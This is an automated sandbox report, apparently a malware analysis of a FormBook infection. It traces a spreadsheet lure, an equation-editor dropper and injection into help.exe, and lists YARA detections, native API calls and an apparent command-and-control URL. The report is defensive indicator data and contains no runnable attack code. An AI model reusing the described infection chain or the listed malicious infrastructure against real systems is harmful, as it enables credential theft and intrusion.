          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: help.exe, 00000007.00000002.2376290691.0000000001262000.00000004.00000001.sdmpString found in binary or memory: https://calusapta.membershiptoolkit.com/gqx2/?LBbXpL=NDTQX7mapLrAPB2lUlM56Hgg

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 24 25 26 27 28 29 30 31 0 0 32 33 0 0 34 35
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041826B NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418212 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B40078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B40048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B410D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B40060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B401D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B41148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B41930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B40C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B41D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009607AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009610D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00960048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00960078 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00960060 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009601D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0096010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00961148 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00961930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00960C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00961D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0095FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00098270 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000982F0 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000981BA NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00098212 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009826B NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C6332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C67C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00322148
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00321BA0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00321E90
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00323B38
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00323B28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C81E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D03C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CB97
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C5F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B509
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C5BB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B7D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B6905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B53040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BF1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BF63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B763DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B52305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B9A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B57353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B85485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B61489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BD443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B8D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B6C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B96540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B54680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B9A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BF2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BD579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B857C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BEF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B7286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B529B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BF098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B669FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BD5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BD394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00C03A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BFCBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BDDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B77B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BEFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B80D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B82E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B6EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BECFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BC2FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B60F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B7DF7C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0096E0C6
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0099D005
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0098905A
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00973040
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009ED06D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0096E2E9
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A11238
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A163BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009963DB
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0096F3CF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00972305
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00977353
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009BA37B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00981489
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009A5485
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009F443E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009AD47D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0098C5F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009F05E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0097351F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009B6540
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00974680
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0097E6C1
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A12622
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009BA634
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009F579A
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0097C7BC
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009A57C3
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A0F8EE
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009EF8C4
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0097C85C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0099286D
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009729B2
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A1098E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009869FE
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009F5955
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009F394B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A23A83
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A1CBA4
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0096FBD7
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009FDBDA
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009F6BCB
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00997B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A0FDDD
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009A0D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0097CD5B
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009A2E2F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0098EE4C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00A0CFB1
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_009E2FDC
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00980F3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0099DF7C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009D03C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B509
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009C5BB
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009C81E
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009CB97
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00088C5F
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00088C60
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009CE4C
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C67C7
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C5062
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C32FF
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C1362
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C3302
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C75B2
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C08F9
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_006C0902
          Source: 0113 INV_PAK.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B4E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B9373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B93F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00BBF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B4DF5C appears 119 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 009B3F92 appears 132 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 009B373B appears 245 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0096DF5C appears 123 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0096E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 009DF970 appears 84 times
          Source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
